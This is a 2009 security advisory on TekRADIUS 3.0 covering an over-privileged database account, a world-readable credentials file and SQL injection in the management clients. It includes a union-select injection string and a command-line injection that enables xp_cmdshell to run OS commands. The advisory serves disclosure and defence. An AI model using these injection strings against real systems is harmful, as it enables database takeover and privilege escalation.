-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nth Dimension Security Advisory (NDSA20090412)
Date: 12th April 2009
Author: Tim Brown <mailto:timb@nth-dimension.org.uk>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: TekRADIUS 3.0 <http://www.tekradius.com/>
Vendor: Yasin KAPLAN <http://www.yasinkaplan.com/>
Risk: Medium

Summary

This advisory comes in 3 related parts:

1) By default, TekRADIUS connects to SQL Server as the sa (or equivelent)
account, this is to allow it to create its database.

2) The TekRADIUS database credentials are stored in obfuscated form, but
the file itself is accessible by any Windows user.

3) TekRADIUS comes with GUI and command line clients.  These do not
sanitise all input satisfactorily.  This can lead to SQL injection
allowing compromise of the database server and privilege escalation at
the Windows level.

Technical Details

1) In the event that TekRADIUS is configured to use the sa (or equivelent)
account in order to access its database after initial creation, then any
failure to correctly satitise input, which results in SQL injection may
allow an attacker privileged access to the database server.

2) TekRADIUS stores the database credentials in C:\Program Files\TekRADIUS\TekRADIUS.ini.
As we can see below, this file is accessible by any local Windows
user including all members of the Users group:

C:\Program Files\TekRADIUS>cacls TekRADIUS.ini
C:\Program Files\TekRADIUS\TekRADIUS.ini BUILTIN\Users:R
                                         BUILTIN\Power Users:C
                                         BUILTIN\Administrators:F
                                         NT AUTHORITY\SYSTEM:F
                                         NT AUTHORITY\TERMINAL SERVER USER:C

This happens even when we change the default install option and
opt only to install TekRADIUS for the current Windows user, and appears to
be by design as we discuss later.  Note that the credentials are obfuscated
with the intention of preventing direct database access.

3) TekRADIUS is intended to be managed using either a GUI or command line
client.  In both cases, non-privileged Windows users are only presented with
limited functionality designed to prevent certain changes being made.
However, this is not entirely successful due to insufficient input santisation
which can lead to SQL injection.

When the GUI is opened by a non-privileged user, they are presented with a
window containing 3 tabs, one of which is the "Users" tab.  Within this is a
"Browse Users" text box.  Injecting the following string in to this text box:

' union select system_user,@@version;--

Results in a table being returned containing the results as queried.

Whilst the command line client correctly sanitises most input, in one case
this is not the case and it is therefore possible to inject arbitrary SQL
in to queries made to the database server.  For example:

C:\Program Files\TekRADIUS>trcli  -r "'; exec master.dbo.sp_configure 'show advanced options', 1; reconfigure; exec master.dbo.sp_configure 'xp_cmdshell', 1; reconfigure; exec master.dbo.xp_cmdshell 'ping www.nth-dimension.org.uk'--"

This injects the neccessary SQL calls to reenable xp_cmdshell (neccessary on
SQL Server 2005) and execute "ping www.nth-dimension.org.uk".

Solutions

Unfortunately, Nth Dimension are unware of any fixes for these issues at the
current time.  The vendor was contacted on the 13th April 2009 and immediately
responded.  The vendor provided a private patch that partially resolved the
issue and Nth Dimension gave feedback outlining further issues with SQL
injection into the GUI and suggesting parameterised queries.  Nth Dimension
also made suggestions around the installation routine to resolve the file
permission issues.  Nth Dimension are not aware that the patch or the
additional feedback has been included in to the public product and no further
emails have been received.  We would recommend that access to TekRADIUS.ini
is revoked for untrusted users, and that TekRADIUS is reconfigured to use
a non-privileged database account.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQIcBAEBAgAGBQJKUUSgAAoJEPJhpTVyySo7fJ0QAJesL6krHe6y/4uiCBeZTJ3b
ytt+nMHLo5urA1M8Y13H+C67D1Jopcw7VoTlcTJEDBXd0KFMPO1IlztKQQCs1G3P
DQ7OrRDf/8GCca+BY8dFWYC82QgRVRO/zQzWqxPsh9gMZ2qJYYbzF1fpkRxs/yT7
JzuD8eTDN2bth0EUhCgPd2LzP/qUDRZ98r254/Ml4DMo2Gg/iFZEkl2vHMnVwK8i
wErIrNo7Z/kFoQOx1GOwZNjZh+ZnidQlU4Lj98sire+Ly4JryELUAkck0NjpA2TV
Q9kaw+2ib/U8OO3Hk00HxN+MXedT3fqVyIB2um5n5dVBnTC0EnU94qjEGlanHDuP
StVseruE43cW01ye5nDmB3hBuun4JnRe5IHl9ljU6r8uFIuHdoiODd2Pg/um7L5E
gTFyC57TQXwK2Ux4nG0hS5QmhudXbOrcN0yWad88qR0WfpTysRft10mXqm8nBGoE
nbfUKlneR9QN3bRzFeiDjM8v1dfCRFgJUovVAY2E4+RmcEGXfoCU01bPbs/JxroQ
0htkv586rVePJiGne0zQxOHc+e8cDn5urggAPtqGqEzTYknzQzD0zxjmE3CICGr4
AwHG7slghOSxQuUvL1CCqnTrvZ8+L8M86/loiCOElFT5YnDAwqgTpd1QM+8qyAUo
4JAGK/YRJDZYYQ8uUDPN
=ZC+P
-----END PGP SIGNATURE-----